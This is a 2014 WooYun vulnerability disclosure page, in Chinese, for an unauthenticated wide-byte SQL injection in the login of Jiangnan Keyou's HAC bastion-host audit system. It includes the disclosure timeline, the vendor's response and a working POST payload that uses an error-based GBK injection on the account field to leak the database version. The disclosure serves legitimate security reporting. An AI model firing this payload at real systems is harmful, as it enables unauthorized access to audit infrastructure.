当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061617

漏洞标题:江南科友HAC运维审计系统(通杀)SQL注入漏洞(无需登录)

相关厂商:江南科友科技股份有限公司

漏洞作者: 路人甲

提交时间:2014-05-20 16:54

修复时间:2014-08-18 16:56

公开时间:2014-08-18 16:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-20: 细节已通知厂商并且等待厂商处理中
2014-05-25: 厂商已经确认,细节仅向厂商公开
2014-05-28: 细节向第三方安全合作伙伴开放
2014-07-19: 细节向核心白帽子及相关领域专家公开
2014-07-29: 细节向普通白帽子公开
2014-08-08: 细节向实习白帽子公开
2014-08-18: 细节向公众公开

简要描述:

详细说明:

江南科友hac (堡垒机)
无需登录,通杀
0x01 介绍背景
运维安全审计系统(HAC)着眼于解决关键IT基础设施运维安全问题。它能够对Unix和Windows主机、服务器以及网络、安全设备上的数据访问进行安全、有效的操作审计,支持实时监控和事后回放。HAC补了传统审计系统的不足,将运维审计由事件审计提升为内容审计,集身份认证、授权、审计为一体,有效地实现了事前预防、事中控制和事后审计。
0x02 漏洞原因
江南科友该堡垒机由于在登录过程当中,对字符过滤不当,默认是GBK编码,在写入mysql数据库过程当中,采用了该编码,导致产生一个针对中文编码的SQL注入漏洞,熟称“宽字节注入”
本次属于黑盒测试,效果如下:

7{0RO1B[[}XHJ94OJN}6%18.jpg


其中登录过程当中用户名字段存在“宽字节注入”
如下

password_check=1&account=%cf' and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);&password=bbb&usb_code=&certcn=&randvalue=1205311366&notifypwd=&ac=&timeout=


测试效果如下:

PT}H@Z_JNDMVD0$VFJN%{EF.jpg


EO)}`L$RK$VPXOLONMLZC1H.jpg


~TK@IMS1(EXI(2TZ6KN~K4X.jpg


数据库为:hacconf1
0x04 修复
更改数据库编码格式吧? 或者采用其他修复方案吧
这种问题应该较多。。。

漏洞证明:

EO)}`L$RK$VPXOLONMLZC1H.jpg


~TK@IMS1(EXI(2TZ6KN~K4X.jpg


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-05-25 09:15

厂商回复:

对于内部网络系统,暂无实例进行验证,根据经验以及测试结果先行认定。已经由cnvd通过以往建立的处置渠道向广州江南科友科技股份有限公司 技术服务中心 任工转 报漏 洞情况。

最新状态:

暂无